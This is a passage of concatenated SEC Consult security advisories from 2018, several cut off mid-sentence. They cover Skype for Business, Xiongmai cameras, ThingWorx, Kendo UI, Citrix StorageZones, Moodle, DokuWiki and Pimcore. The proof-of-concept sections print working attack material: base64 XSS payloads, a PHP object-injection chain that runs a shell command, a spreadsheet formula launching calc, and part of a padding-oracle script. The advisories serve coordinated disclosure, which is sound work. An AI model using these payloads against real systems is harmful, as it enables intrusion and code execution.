Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately, especially if Skype for Business is being used for external communication.

Vulnerability overview/description:
---
A large number of emojis (e.g. ~800 kittens) received in one message by the Skype for Business client freezes the program for a few seconds. This can be exploited to perform Denial of Service attacks against Skype for Business users and compromises the availability of the program. For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video. Note that the sound and video streams are handled by a separate thread and therefore are not affected (e.g. killed); only the functions related to the graphical user interface become unusable.
Proof of concept:
-
After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted. The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: ;tag=82254700;epid=e67b0162bec8
To: ;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:
Contact:
Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
[...]

Vulnerable / tested versions:
-
The following versions have been identified as vulnerable which were the latest versions available at the time of the test:
* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit
Both versions were running on Windows 10 Pro.
According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000

Vendor contact timeline:
2018-08-02: Vulnerability details submitted to Microsoft, MSRC Case 47060 assigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue as the provided workaround is not effective for attacks already in progress
2018-08-31: Vendor: decided to f
SEC Consult SA-20181009-0 :: Remote Code Execution via XMeye P2P Cloud in Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices (CVE-2018-17915, CVE-2018-17917, CVE-2018-17919)
SEC Consult also published a blog post regarding the identified security issues with further background information:
Blog: https://r.sec-consult.com/xmeye

SEC Consult Vulnerability Lab Security Advisory < 20181009-0 >
===
title: Remote Code Execution via XMeye P2P Cloud
product: Xiongmai IP Cameras, NVRs and DVRs incl. 3rd party OEM devices
vulnerable version: see below
fixed version: -
CVE number: CVE-2018-17915, CVE-2018-17917, CVE-2018-17919
impact: Critical
homepage: http://www.xiongmaitech.com/en/
found: 2018-03-05
by: Stefan Viehböck (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Hangzhou Xiongmai Technology Co., Ltd concentrates on security surveillance, Video intelligent research and development. We devote ourselves to providing good products, technical services for manufacturers, wholesaler and service provider, in order to offer better experience for our customers. We are global leading providers in security video products and technology. Established from 2009, many years development, the headquarter of XM locate in Yinhu Innovation Center, Fuyang district, Hangzhou now. Total registered capital reach to 60 million. Now we owns nearly 2000 employees including a strong R&D team (more than 300 experienced engineers)."
Source: http://www.xiongmaitech.com/en/index.php/about/company/18

Business recommendation:
SEC Consult has identified highly critical vulnerabilities in Xiongmai products and the "XMeye P2P Cloud" feature which is being used in many 3rd party OEM devices as well. The vendor does not provide proper mitigations and hence it is recommended not to use any products associated with the XMeye P2P Cloud until all of the identified security issues have been fixed and a thorough security analysis has been performed by professionals.
Vulnerability overview/description:
---
1) Predictable XMEye Cloud IDs (CVE-2018-17915)
All Xiongmai devices come with a feature called "XMeye P2P Cloud". It is a proprietary, UDP-based protocol that allows users to access their IP cameras or NVRs/DVRs via the internet. The feature is enabled by default; no setup by the user is required. The device initiates and keeps a connection to a Xiongmai cloud server. All connections between clients and the devices are established via Xiongmai cloud servers. This approach allows users to connect to devices that are behind firewalls, NATed etc.

The unique, per-device identifier is the cloud ID. It is a 16 character long hexadecimal string (e.g. f7e708f21de0fde0). Anyone who knows the device identifier and the admin credentials can establish a connection to a device using the XMEye apps (Android, iOS) or a "VMS" desktop application.

The Cloud ID may be unique, but it is not random. It is derived (at boot time) from the device MAC address using a few simple operations (see get_sn_from_mac() below). An attacker can enumerate potential MACs/cloud IDs and find valid ones, then use the weak default credentials to log in. This allows the attacker to watch the video feed, change the device configuration and possibly gain remote code execution using other vulnerabilities. The XMEye functionality allows an attacker to attack devices that are behind firewalls, NATed networks etc.

MAC addresses have a well defined structure: 3-octet OUI (Vendor) + 3-octet NIC ID
OUIs are assigned by the IEEE. Interestingly Xiongmai does not own an OUI, but instead uses the OUIs of other companies. The following OUIs are used by Xiongmai devices (OUIs based on internet research, scanning, company names based on [1]):
001210 WideRay Corp
001211 Protechna Herbst GmbH & Co. KG
001212 PLUS Corporation
001213 Metrohm AG
001214 Koenig & Bauer AG
001215 iStor Networks, Inc.
001216 ICP Internet Communication Payment AG
001217 Cisco-Linksys, LLC
001218 ARUZE Corporation
003E0B - Not assigned

We developed a cloud ID scanner that queries the Xiongmai cloud server. The responses indicate if there is a device online that uses the given cloud ID, plus provide the IP of a Xiongmai Cloud hop server that is geographically close to the device. One query is one UDP packet. We scanned 0.02% of the devices (random choice) in each OUI range (16 Million devices per range) and extrapolated the results.

OUI: 001210; IDs checked 3,365; Devices online 3; Success rate: 0.1%; extrapolated devices online: 14,957
OUI: 001211; IDs checked 3,363; Devices online 9; Success rate:
SEC Consult SA-20181001-0 :: Password disclosure vulnerability & XSS in PTC ThingWorx (CVE-2018-17216, CVE-2018-17217, CVE-2018-17218)
SEC Consult Vulnerability Lab Security Advisory < 20181001-0 >
===
title: Password disclosure vulnerability & XSS
product: PTC ThingWorx
vulnerable version: 6.5-7.4, 8.0.x, 8.1.x, 8.2.x
fixed version: see Solution section
CVE number: CVE-2018-17216, CVE-2018-17217, CVE-2018-17218
impact: critical
homepage: https://www.ptc.com
found: 2018-03-13
by: M. Tomaselli (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ThingWorx is more than an IoT platform; it provides the functionality, flexibility and scalability that businesses need to drive industrial innovation, including the ability to source, contextualize and synthesize data while orchestrating processes and delivering powerful web, mobile and AR experiences."
Source: https://www.ptc.com/en/thingworx8

Business recommendation:
ThingWorx allows configuring Things to communicate with other services over several protocols (e.g. LDAP integration via a DirectoryServices Thing). In order to communicate with services that require authentication, ThingWorx provides functionality to associate credentials to a Thing.
During a brief audit it was noticed that ThingWorx Composer leaks the following sensitive data:
1) The PBKDF2WithHmac512 password hash of a user Thing
2) The AES encrypted password of several Things containing password attributes
Furthermore, the password used for encryption is hard-coded and thus identical across all installations.
Besides the above mentioned vulnerabilities a reflected cross-site scripting vulnerability was identified in the ThingWorx SQUEAL search function.
The vendor provides a patch which should be installed immediately. It is recommended to perform further thorough security audits as the product may be affected by other potential security vulnerabilities.
Vulnerability overview/description:
---
1) Disclosure of User Password Hashes to Privileged Users (CVE-2018-17216)
ThingWorx discloses the PBKDF2WithHmac512 hashed passwords of its application users when doing exports with an administrative account. This enables an attacker to conduct offline brute-force or dictionary attacks against the obtained password hashes.

2) Disclosure of Encrypted Credentials and Use of Hard-Coded Passwords (CVE-2018-17217)
A critical information disclosure vulnerability leaks the AES encrypted passwords of services configured within ThingWorx. Due to a hard-coded master password in the SecureData class, an attacker is able to decrypt the obtained passwords, which grants him access to other services. The AES encrypted password gets disclosed in the server response when a user/attacker visits a Thing that contains credentials.

3) Reflected Cross-Site Scripting (CVE-2018-17218)
The JavaScript part of the ThingWorx SQUEAL search functionality (searchExpression parameter), which is responsible for parsing the obtained JSON response, fails to properly sanitize user supplied input. If the victim views attacker-prepared content (e.g. on a website or in an HTML email), an attacker is able to execute arbitrary actions in the context of the victims' sessions.

Proof of concept:
-
The proof of concept has been removed from this advisory.

Vulnerable / tested versions:
-
The vulnerabilities have been verified to exist in version 8.0.1-b39 which was the latest version available at the time of the test. The vendor provided further affected version information. See the Solution section for reference.
Vendor contact timeline:
2018-03-14: Contacting vendor through email
2018-03-16: Advisory sent to vendor via encrypted mail
2018-03 - 2018-09: Multiple phone calls with PTC R&D department discussing release & multi-party disclosure
2018-08-15: Vendor provided private notifications to customers to give 45 days to upgrade
2018-10-01: Coordinated release of SEC Consult advisory

Solution:
-
Best recommendation is to upgrade to the latest version of ThingWorx, version 8.3.2 (at time of writing). For newer versions, the issue of the hard coded password has been fixed and the SQUEAL function removed.
The minimum upgrade to obtain mitigations for all 3 issues depends on the version of ThingWorx in use.
For ThingWorx versions 6.5-7.4, upgrade to 7.4.14+
For ThingWorx version 8.0.x, upgrade to 8.0.12+
For ThingWorx version 8.1.x, upgrade to 8.1.7+
For ThingWorx version 8.2.x, upgrade to 8.2.4+
The vendor always recommends upgradin
SEC Consult SA-20180926-0 ::
SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
===
title: Stored Cross-Site Scripting
product: Progress Kendo UI Editor
vulnerable version: v2018.1.221
fixed version: none, see workaround
CVE number: CVE-2018-14037
impact: medium
homepage: https://www.progress.com/kendo-ui
found: 2018-04-23
by: M. Tomaselli (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"The Editor allows users to create rich text content by means of a WYSIWYG interface. This HTML5 widget outputs identical HTML across all major browsers, follows accessibility standards and provides an API for content manipulation. The generated widget value is comprised of XHTML markup."
https://www.telerik.com/kendo-ui/editor

Business recommendation:
SEC Consult recommends to implement the workarounds provided by the vendor.

Vulnerability overview/description:
---
The demo application of the Kendo UI Editor which is hosted at https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function which should protect from cross site scripting. However, the implemented Sanitizer fails to catch certain payloads which allow an attacker to execute JavaScript in the context of the editor itself.
Proof of concept:
-
The following, incomplete, list of payloads can be used to trigger an alert box in the API demo application of the Kendo UI Editor:
https://demos.telerik.com/kendo-ui/editor/api

After a click on the button the setValue function on line 513 of the beautified "api.js" is called:

var setValue = function () {
    editor.value($("#value").val());
};

The value function is implemented in line 64383 of the beautified "kendo.all.js" file and defined as:

value: function (html) {
    var body = this.body, editorNS = kendo.ui.editor, options = this.options, currentHtml = editorNS.Serializer.domToXhtml(body, options.serialization);
    if (html === undefined) {
        return currentHtml;
    }
    if (html == currentHtml) {
        return;
    }
    editorNS.Serializer.htmlToDom(html, body, options.deserialization);
    this.selectionRestorePoint = null;
    this.update();
    this.toolbar.refreshTools();
},

In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom() function is called which can be seen in the excerpt below:

var Serializer = {
    toEditableHtml: function (html) {
        return (html || '').replace(/<!\[CDATA\[(.*)?\]\]>/g, '<!--[CDATA[$1]]-->').replace(/<(\/?)script([^>]*)>/gi, '<$1k:script$2>').replace(/<img([^>]*)>/gi, function (match) {
            return match.replace(onerrorRe, '');
        }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi, '$1').replace(/^<(table|blockquote)/i, br + '<$1').replace(/^[\s]*(&nbsp;|\u00a0)/i, '$1').replace(/<\/(table|blockquote)>$/i, '</$1>' + br);
    },

Although certain payloads are detected and sanitized by the function, the implemented protection fails to detect the data URI payload. The payload is added unescaped to the editor DOM after several other function calls.
Vulnerable / tested versions:
-
The following version has been identified to be vulnerable:
* v2018.1.221

Vendor contact timeline:
2018-05-02: Contacting vendor through email for security contact
2018-05-02: Contact person requests to obtain advisory via unencrypted mail
2018-05-08: Advisory delivered through unencrypted email to vendor
2018-05-29: Contacting vendor for current status and informing them about the publishing date
2018-07-02: Reminded the vendor that the advisory will be published soon
2018-07-02: Multiple emails exchanged, vendor demands that customers need to issue a support ticket on this case
2018-07-03: Telling them that it is a security issue they have already known about for two months without seemingly acting upon it. Vendor: product managers have been informed and will contact us; no further info
2018-07-11: Asking vendor again for a status update & patch information
2018-07-11: Vendor: "Thank you for following up. I have sent this to the product team to take into consideration. They will be following up with you as they may need. We appreciate you following up regarding this request."
2018-07-12: Detailed answer from vendor regarding workaround
2018-07-13: Requested CVE num
Re: SEC Consult SA-20180926-0 :: Stored Cross-Site Scripting in Progress Kendo UI Editor
here with correct email subject :)

On 9/26/18 2:17 PM, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180926-0 >
> ===
> title: Stored Cross-Site Scripting
> product: Progress Kendo UI Editor
> vulnerable version: v2018.1.221
> fixed version: none, see workaround
> CVE number: CVE-2018-14037
> impact: medium
> homepage: https://www.progress.com/kendo-ui
> found: 2018-04-23
> by: M. Tomaselli (Office Munich)
> SEC Consult Vulnerability Lab
>
> An integrated part of SEC Consult
> Europe | Asia | North America
>
> https://www.sec-consult.com
>
> ===
>
> Vendor description:
> ---
> "The Editor allows users to create rich text content by means of a WYSIWYG
> interface. This HTML5 widget outputs identical HTML across all major browsers,
> follows accessibility standards and provides an API for content manipulation.
> The generated widget value is comprised of XHTML markup."
>
> https://www.telerik.com/kendo-ui/editor
>
>
> Business recommendation:
>
> SEC Consult recommends to implement the workarounds provided by the vendor.
>
>
> Vulnerability overview/description:
> ---
> The demo application of the Kendo UI Editor which is hosted at
> https://demos.telerik.com/kendo-ui/editor/api implements a Sanitizer function
> which should protect from cross site scripting. However, the implemented
> Sanitizer fails to catch certain payloads which allow an attacker to execute
> JavaScript in the context of the editor itself.
>
>
> Proof of concept:
> -
> The following, incomplete, list of payloads can be used to trigger an alert
> box in the API demo application of the Kendo UI Editor:
> https://demos.telerik.com/kendo-ui/editor/api
>
>
> data="data:text/html;base64,PHNjcmlwdD5hbGVydCgic2VjdGVzdCIpPC9zY3JpcHQ+">
>
> HTTP-EQUIV="refresh"
> CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
>
>
>
> After a click on the button the setValue function on line 513 of the
> beautified
> "api.js" is called:
>
> var setValue = function () {
>     editor.value($("#value").val());
> };
>
>
> The value function is implemented in line 64383 of the beautified
> "kendo.all.js"
> file and defined as:
>
> value: function (html) {
>     var body = this.body, editorNS = kendo.ui.editor, options =
>     this.options, currentHtml = editorNS.Serializer.domToXhtml(body,
>     options.serialization);
>     if (html === undefined) {
>         return currentHtml;
>     }
>     if (html == currentHtml) {
>         return;
>     }
>     editorNS.Serializer.htmlToDom(html, body,
>     options.deserialization);
>     this.selectionRestorePoint = null;
>     this.update();
>     this.toolbar.refreshTools();
> },
>
> In order to mitigate certain XSS payloads the editorNS.Serializer.htmlToDom()
> function is called which can be seen in the excerpt below:
>
> var Serializer = {
>     toEditableHtml: function (html) {
>         return (html || '').replace(/<!\[CDATA\[(.*)?\]\]>/g,
>         '<!--[CDATA[$1]]-->').replace(/<(\/?)script([^>]*)>/gi,
>         '<$1k:script$2>').replace(/<img([^>]*)>/gi, function (match) {
>             return match.replace(onerrorRe, '');
>         }).replace(/(<\/?img[^>]*>)[\r\n\v\f\t ]+/gi,
>         '$1').replace(/^<(table|blockquote)/i, br +
>         '<$1').replace(/^[\s]*(&nbsp;|\u00a0)/i,
>         '$1').replace(/<\/(table|blockquote)>$/i,
>         '</$1>' + br);
>     },
>
> Although certain payloads are detected and sanitized by the function, the
> implemented protection fails to detect the data URI payload. The payload is
> added unescaped to the editor DOM after several other function calls.
>
>
> Vulnerable / tested versions:
> -
> The following version has been identified to be vulnerable:
> * v2018.1.221
>
>
> Vendor contact timeline:
>
> 2018-05-02: Contacting vendor through email for security contact
> 2018-05-02: Contact person requests to obtain advisory via unencrypted mail
> 2018-05-08: Advisory delivered through unencrypted email to vendor
> 2018-05-29: Contacting vendor for curren
SEC Consult SA-20180924-0 :: Multiple Vulnerabilities in Citrix StorageZones Controller
SEC Consult Vulnerability Lab Security Advisory < 20180924-0 >
===
title: Multiple Vulnerabilities
product: Citrix StorageZones Controller
vulnerable version: all versions before 5.4.2
fixed version: 5.4.2
CVE number: CVE-2018-16968, CVE-2018-16969
impact: Medium
homepage: https://www.citrix.com/
found: 2018-08
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"ShareFile is a file sharing service that enables users to easily and securely exchange documents. ShareFile Enterprise provides enterprise-class service and includes StorageZones Controller and the User Management Tool. ShareFile StorageZones Controller extends the ShareFile software as a service (SaaS) cloud storage by providing your ShareFile account with private data storage, referred to as StorageZones for ShareFile Data. [...]."
URL: https://docs.citrix.com/en-us/storagezones-controller/5-0.html

Business recommendation:
Users of this product are advised to install the security patch provided by Citrix.
The vulnerabilities identified suggest that no sufficient technical security audit has yet been conducted on the Citrix StorageZones Controller. SEC Consult recommends Citrix to conduct such an audit.

Vulnerability overview/description:
---
The Citrix StorageZones Controller exposes resources that are typically only available to the internal network (e.g. CIFS Windows shares) to clients connecting from the Internet. In order to hide internal network paths from the user and in order to only allow access to paths specifically allowed by the administrator, internal network paths are encrypted. E.g. if an administrator wants to allow access to a UNC path (e.g. \\testhost\testshare\testdir) this string is encrypted and provided to the client. When the user calls the API to e.g.
list the contents of this directory, the StorageZones Controller returns the encrypted absolute paths for each directory entry. This way, the absolute internal paths are always hidden from the user.

1) Improper Access Restrictions
Citrix StorageZones Controller offers users a functionality to convert UNC paths into their encrypted form. Therefore, users are able to access any UNC paths accessible by the StorageZones Controller. When providing access to a network share, the StorageZones Controller impersonates the user. Therefore, unauthorized access to network shares is not possible.
However, Citrix StorageZones Controller internally does not distinguish between UNC paths (e.g. \\testhost\testshare) and local paths (e.g. C:\Windows). Therefore, users may access (e.g. read, write, delete) local paths for which they have appropriate NTFS permissions.
Note: Citrix StorageZones allows an administrator to define the paths exposed by the StorageZones Controller. By configuring this setting an administrator can restrict access to only network paths. The configuration page incorrectly states that a value of "*" (the default value) "allows connections to all hosts on the internal network", while in fact it also allows access to local paths.

2) Padding Oracle
The encryption mechanism used by the Citrix StorageZones Controller is vulnerable to a padding oracle attack. This allows an attacker to partly decrypt or potentially modify internal paths.

3) Path Traversal
The upload functionality is vulnerable to a path traversal attack if the preconditions to exploit vulnerability #1 are met. In practice this vulnerability has a similar effect as vulnerability #1.

Proof of concept:
-
1) Improper Access Restrictions
The following URL demonstrates how local paths can be encrypted:
https:///cifs/v3/Items/ByPath?path=c:\
The following URL demonstrates how e.g.
the contents of the directory can be listed:
https:///cifs/v3/Items()?$expand=Children

2) Padding Oracle
The following script demonstrates how encrypted internal paths can partly be decrypted. It may also be possible to partly modify encrypted paths (this has not been verified).

snip
import sys
sys.path.append('python-paddingoracle')
from paddingoracle import BadPaddingException, PaddingOracle, xor
from base64 import b64encode, b64decode
from urllib import quote, unquote
import requests
import socket
import time
import getpass

URL = 'http:///'
AUTH = (raw_input('User: '), getpass.getpass('Password: '))
CIPHER = ''

class PadBuster(PaddingOracle):
    def __init__(self, **kwargs):
        super(PadBuster, self).__i
SEC Consult SA-20180918-0 :: Remote Code Execution via PHP unserialize in Moodle open-source learning platform
SEC Consult Vulnerability Lab Security Advisory < 20180918-0 >
===
title: Remote Code Execution via PHP unserialize
product: Moodle - Open-source learning platform
vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions
fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14
CVE number: CVE-2018-14630
impact: critical
homepage: https://moodle.org/
found: 2018-07-08
by: Johannes Moritz (Office Berlin)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Moodle is a learning platform designed to provide educators, administrators and learners with a single robust, secure and integrated system to create personalised learning environments. Powering tens of thousands of learning environments globally, Moodle is trusted by institutions and organisations large and small, including Shell, London School of Economics, State University of New York, Microsoft and the Open University. Moodle’s worldwide numbers of more than 90 million users across both academic and enterprise level usage makes it the world’s most widely used learning platform."
Source: https://moodle.org/about

Business recommendation:
The vendor provides a patch which should be installed immediately.
SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description:
---
1) Remote Code Execution via PHP unserialize (CVE-2018-14630)
When importing a "drag and drop into text" (ddwtos) question in the legacy Moodle XML format, the passed feedback answer is used unsanitized in an unserialize() function, which leads to a PHP Object Injection vulnerability. By providing a sophisticated PHP Object chain it is possible to leverage the POI into a full-blown arbitrary Remote Code Execution (RCE).
To exploit this vulnerability an attacker needs permissions to create a quiz or at least be able to import questions. A user of the role teacher usually has these permissions. However, students can also be assigned to the role teacher for a specific course. Proof of concept: - 1) Remote Code Execution via PHP unserialize (CVE-2018-14630) In order to exploit this issue an attacker has to open Moodle's question bank for a specific course and import the following Moodle XML file. The answer feedback contains a sophisticated PHP object chain which only contains objects from Moodles library. After the parsing process the command "echo `whoami`" is being executed. question name O:15:"\\core\\lock\\lock":2:{s:3:"key";O:23:"\\core_availability\\tree":1:{s:8:"children";O:24:"\\core\\dml\\recordset_walk":2:{s:8:"callback";s:6:"system";s:9:"recordset";O:25:"question_attempt_iterator":2: {s:4:"quba";O:26:"question_usage_by_activity":1:{s:16:"questionattempts";a:1:{s:4:"1337";s:13:"echo `whoami`";}}s:5:"slots";a:1:{i:0;i:1337;s:8:"infinite";i:1;} Vulnerable / tested versions: - The following version has been tested which was the most recent one at the time of the test: * 3.5.1+ According to the vendor, all previous versions are affected as well: * 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions Vendor contact timeline: 2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie from RIPS Technologies) 2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880] created) 2018-07-09: Vendor replied and supplied a fix for the vulnerability 2018-09-10: Vendor releases patched version 2018-09-18: Public release of security advisory Solution: - The vendor provides a patched version (3.5.2) which should be installed immediately: https://download.moodle.org/releases/latest/ The vendor also provided a security advisory regarding this issue: https://moodle.org/mod/forum/discuss.php?d=376023#p1516118 Workaround: --- Disable 
import of ddwtos questions through XML files. Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | A
SEC Consult SA-20180906-0 :: CSV Formula Injection in DokuWiki

SEC Consult Vulnerability Lab Security Advisory < 20180906-0 >
===
title: CSV Formula Injection
product: DokuWiki
vulnerable version: 2018-04-22a "Greebo" and older versions
fixed version: None
CVE number: CVE-2018-15474
impact: Medium
homepage: https://www.dokuwiki.org
found: 2018-07-09
by: Jean-Benjamin Rousseau (Office Zurich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"DokuWiki is a simple to use and highly versatile Open Source wiki software that doesn't require a database. It is loved by users for its clean and readable syntax. The ease of maintenance, backup and integration makes it an administrator's favorite. Built in access controls and authentication connectors make DokuWiki especially useful in the enterprise context and the large number of plugins contributed by its vibrant community allow for a broad range of use cases beyond a traditional wiki."
Source: https://www.dokuwiki.org/dokuwiki

Business recommendation:
---
The issue will not be fixed according to the vendor. Users are advised to be careful when opening files produced by the CSV export functionality. SEC Consult recommends performing a thorough security review conducted by security professionals to identify and resolve all security issues.

Vulnerability overview/description:
---
1) CSV Formula Injection vulnerability
The administration panel of the application has a "CSV export of users" feature which allows the export of user data (username, real name, email address and user groups) as a CSV file. On the registration page, it is possible for an attacker to set certain values in the Real Name field that - when exported and opened with a spreadsheet application (Microsoft Excel, Open Office, etc.) - will be interpreted as a formula. This puts the administrators who open those malicious exported files at risk.

The result is the exfiltration of sensitive data or even the execution of arbitrary code on the victim's local machine. The final impact depends on the spreadsheet software used on the victim's client.

Proof of concept:
---
1) CSV Formula Injection vulnerability
Registration URL: http://www.example.com/doku.php?id=start=register

When the registration request is submitted, the following parameters are sent in a POST request:
sectok==register=1=login_parameter=evil_csv_formula_injection_payload=email_address

The "fullname" parameter is sanitized neither before being stored nor during the CSV export. An attacker can inject different CSV formula payloads in the fullname parameter. For example:
=cmd|'/C calc'!A0

As soon as the file gets opened in Microsoft Excel, the program calc.exe is launched. Different warnings might pop up. However, these warnings are usually ignored because the file comes from a trusted source.

Vulnerable / tested versions:
---
The latest version 2018-04-22a "Greebo" has been tested:
https://download.dokuwiki.org/out/dokuwiki-8a269cc015a64b40e4c918699f1e1142.tgz

Also found to be vulnerable:
2017-02-19 stable release
2016-06-26 stable release
2015-08-10 stable release
2014-09-29 stable release
2014-05-05 stable release
2013-12-08 stable release

Vendor contact timeline:
---
2018-07-18: Contacting vendor through a...@splitbrain.org
2018-07-18: Vendor replied, they asked for the advisory without encryption
2018-07-19: Advisory sent without encryption
2018-07-19: Vendor replied with no intention to fix the vulnerability
2018-07-30: Reminder sent to the vendor. No reply
2018-08-20: Ask for updates to the vendor
2018-08-20: Vendor replied that no patch will be provided
2018-09-06: Public release of security advisory

Solution:
---
The issue will not be fixed according to the vendor:
https://github.com/splitbrain/dokuwiki/issues/2450

Workaround:
---
None

Advisory URL:
---
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive te
SEC Consult SA-20180813-0 :: SQL Injection, XSS & CSRF vulnerabilities in Pimcore

SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
===
title: SQL Injection, XSS & CSRF vulnerabilities
product: Pimcore
vulnerable version: 5.2.3 and below
fixed version: 5.3.0
CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
impact: High
homepage: https://pimcore.com/en
found: 2018-06-11
by: T. Silpavarangkura (Office Bangkok)
    N. Rai-Ngoen (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
===

Vendor description:
---
"Pimcore is an award-winning consolidated open source enterprise platform for master data management (PIM/MDM), user experience management (CMS/UX), digital asset management (DAM) and eCommerce."
Source: https://pimcore.com/en

Business recommendation:
---
The vendor provides a patch for most identified issues, but the XSS issues will not be fixed according to the vendor. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected by further security issues.

Vulnerability overview/description:
---
1. SQL Injection (CVE-2018-14058)
Multiple SQL injection vulnerabilities have been identified in the REST web service API. An attacker who obtains a valid API key that has been granted the necessary permission could extract information from the database.

2. Stored Cross-site Scripting (CVE-2018-14059)
Multiple stored cross-site scripting vulnerabilities have been identified across multiple functions in the application, which allow an authenticated attacker to insert arbitrary JavaScript code in virtually all text fields and data entries in the application.

3. Cross-site Request Forgery (CVE-2018-14057)
Multiple functions in the application are not protected by the existing anti-CSRF token, which allows an attacker to perform a cross-site request forgery attack to at least add, update or delete entries, among other actions.

Proof of concept:
---
1. SQL Injection (CVE-2018-14058)
The following URLs demonstrate the issue:
http:///webservice/rest/asset-count?apikey=[...]=
http:///webservice/rest/asset-inquire?apikey=[...]=
http:///webservice/rest/asset-list?apikey=[...]=
http:///webservice/rest/document-count?apikey=[...]=
http:///webservice/rest/document-inquire?apikey=[...]=
http:///webservice/rest/document-list?apikey=[...]=
http:///webservice/rest/object-count?apikey=[...]=
http:///webservice/rest/object-inquire?apikey=[...]=
http:///webservice/rest/object-list?apikey=[...]=

Note that a valid API key that is granted at least one of the "Assets", "Documents" or "Objects" permissions is required to perform an SQL injection attack against the associated API endpoints successfully.

2. Stored Cross-site Scripting (CVE-2018-14059)
Most of the text fields in pop-up dialogs and data entries in the application are vulnerable to cross-site scripting, which can be exploited by an authenticated attacker. For example, the attacker could insert an attack payload while performing at least the following actions:
1) Edit a user account's first name/last name/e-mail address.
2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/Quantity Value/Static Routes entry value in the table.
3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/Field-Collections/Objectbrick/Classification Store item.

The vendor stated that many identified XSS issues only affect administrative functions and hence the issues will not be fixed:
"They are only affecting administrative functionalities (higher privileges required) - so this isn't used by non-trusted users - a check just adds additional overhead without any benefits for security."

SEC Consult argued multiple times that XSS can still be exploited, e.g. when a higher privileged user gets attacked, and that the issues should be fixed nevertheless.

3. Cross-site Request Forgery (CVE-2018-14057)
